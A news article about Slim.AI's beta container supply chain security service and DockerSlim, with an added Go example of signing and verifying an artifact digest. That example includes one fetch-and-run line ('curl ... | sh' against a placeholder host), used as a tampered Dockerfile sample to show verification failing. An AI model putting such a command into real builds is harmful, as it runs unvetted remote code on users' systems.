Slim.AI is rising to this challenge by announcing at Open Source Summit in Austin, Texas, its beta software supply chain security service. This service will help organizations continuously and automatically optimize and secure their containers and minimize software supply chain risk.
This service is being built on the foundation of Slim.AI's open-source project, DockerSlim. This popular developer tool optimizes and secures your containers by analyzing your code and throwing away unnecessary code, thus "slimming" down your containers' attack surface. It can also reduce the size of your container by up to 30x.
That's impressive. As Amaral said, "Currently, tens of thousands of developers and teams use Slim's open source and free SaaS software to understand what's in their containers, reduce containers' attack surface, remove vulnerabilities, and ship only the code they need." But the open-source project doesn't scale. So with this new service, Amaral continued, "We're moving from helping individual developers and small teams to a solution that enables organizations to continuously and automatically achieve these outcomes at scale."
Current and planned integrations include Docker, AWS ECR, Google GCR, GitHub, DigitalOcean, and Quay registries and the Jenkins, GitLab, and GitHub CI/CD platforms. Application Programming Interfaces (APIs) are also being made available to Early Access Partners.
In addition, thanks to its APIs, the service enables you to use multiple vulnerability scanners on your containers to find security problems before they bite you.
The good news about the open-source software supply chain is, Amaral explained, "it's really easy for developers to incorporate vast libraries of code into applications, package that into containers, and ship to production with the click of a button. The code running in production is the child of the massive supply chain." The bad news is that "It bears the benefits and risks of all the decisions, contributions, features, and flaws manifested by its creators in aggregate."
Signing: Signing is a way of digitally attaching a verified, immutable developer identity to a piece of code. Coupled with other tools, it allows for creating a transparent, cryptographically secure record of software changes and establishes a permanent and reliable digital chain of custody for software and related artifacts. Sigstore and Notary are two examples of such tools.
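To make the signing idea concrete, here is an added example (not code from the article, Slim.AI, Sigstore, or Notary) in Go. It binds a constructed signer identity label to the SHA-256 digest of an artifact with an Ed25519 signature, then shows that verification fails when either the artifact is tampered with or a different signer's key is used. The attestation format and the `SignerID` label are assumptions made for illustration; a real system would carry the identity in a certificate and publish the record to a transparency log.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Attestation is a constructed, minimal record that binds an artifact digest
// to a signer identity. The format is an assumption for this example only.
type Attestation struct {
	SignerID  string // hypothetical developer identity label
	Digest    string // hex-encoded SHA-256 of the artifact bytes
	Signature []byte // Ed25519 signature over SignerID + "\n" + Digest
}

// GenerateSignerKey creates a fresh Ed25519 key pair for a signer.
func GenerateSignerKey() (ed25519.PublicKey, ed25519.PrivateKey, error) {
	return ed25519.GenerateKey(rand.Reader)
}

// DigestOf returns the hex SHA-256 digest of an artifact.
func DigestOf(artifact []byte) string {
	sum := sha256.Sum256(artifact)
	return hex.EncodeToString(sum[:])
}

// attestationMessage is the exact byte string that gets signed. Including the
// identity in the signed message prevents re-labelling a valid signature.
func attestationMessage(signerID, digest string) []byte {
	return []byte(signerID + "\n" + digest)
}

// SignArtifact produces an attestation for artifact under the signer's key.
func SignArtifact(priv ed25519.PrivateKey, signerID string, artifact []byte) Attestation {
	d := DigestOf(artifact)
	return Attestation{
		SignerID:  signerID,
		Digest:    d,
		Signature: ed25519.Sign(priv, attestationMessage(signerID, d)),
	}
}

// VerifyArtifact checks both that the artifact still matches the attested digest
// and that the signature was made by the holder of the private key for pub.
func VerifyArtifact(pub ed25519.PublicKey, att Attestation, artifact []byte) bool {
	if DigestOf(artifact) != att.Digest {
		return false // artifact changed after it was attested
	}
	return ed25519.Verify(pub, attestationMessage(att.SignerID, att.Digest), att.Signature)
}

func main() {
	// Constructed sample artifact standing in for a container layer or manifest.
	artifact := []byte("FROM scratch\nCOPY app /app\nENTRYPOINT [\"/app\"]\n")

	pub, priv, err := GenerateSignerKey()
	if err != nil {
		panic(err)
	}
	att := SignArtifact(priv, "dev@example.invalid", artifact)
	fmt.Println("digest:", att.Digest)
	fmt.Println("verify original:", VerifyArtifact(pub, att, artifact))

	tampered := append([]byte{}, artifact...)
	tampered = append(tampered, []byte("RUN curl http://example.invalid | sh\n")...)
	fmt.Println("verify tampered:", VerifyArtifact(pub, att, tampered))

	otherPub, _, _ := GenerateSignerKey()
	fmt.Println("verify with wrong signer key:", VerifyArtifact(otherPub, att, artifact))
}
```

The two failure paths are distinct on purpose: a digest mismatch tells you the artifact drifted after attestation, while a signature failure tells you the attestation does not come from the identity you trust. A deployment policy would check both before admitting an image.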
Slimming: This minimizes your production code footprint by removing unnecessary code. It also inherently reduces software supply chain complexity, software attack surface, and aggregate risk.
Sharing: No one person or organization can provide a comprehensive SSCS solution. Communication about SSCS and collaborating on solutions both within your organization and with other groups is essential to advancing the industry and protecting our software-reliant global ecosystem. When it comes to open-source security, we're all in this together.
At Slim, Amaral concluded, "Our core value is 'Know Your Software.' Slim.AI's tools can be used alongside vulnerability scanners and SBOM generators to create a holistic view of the software supply chain." With Slim's optimization, you can make sure teams ship only what they need for production.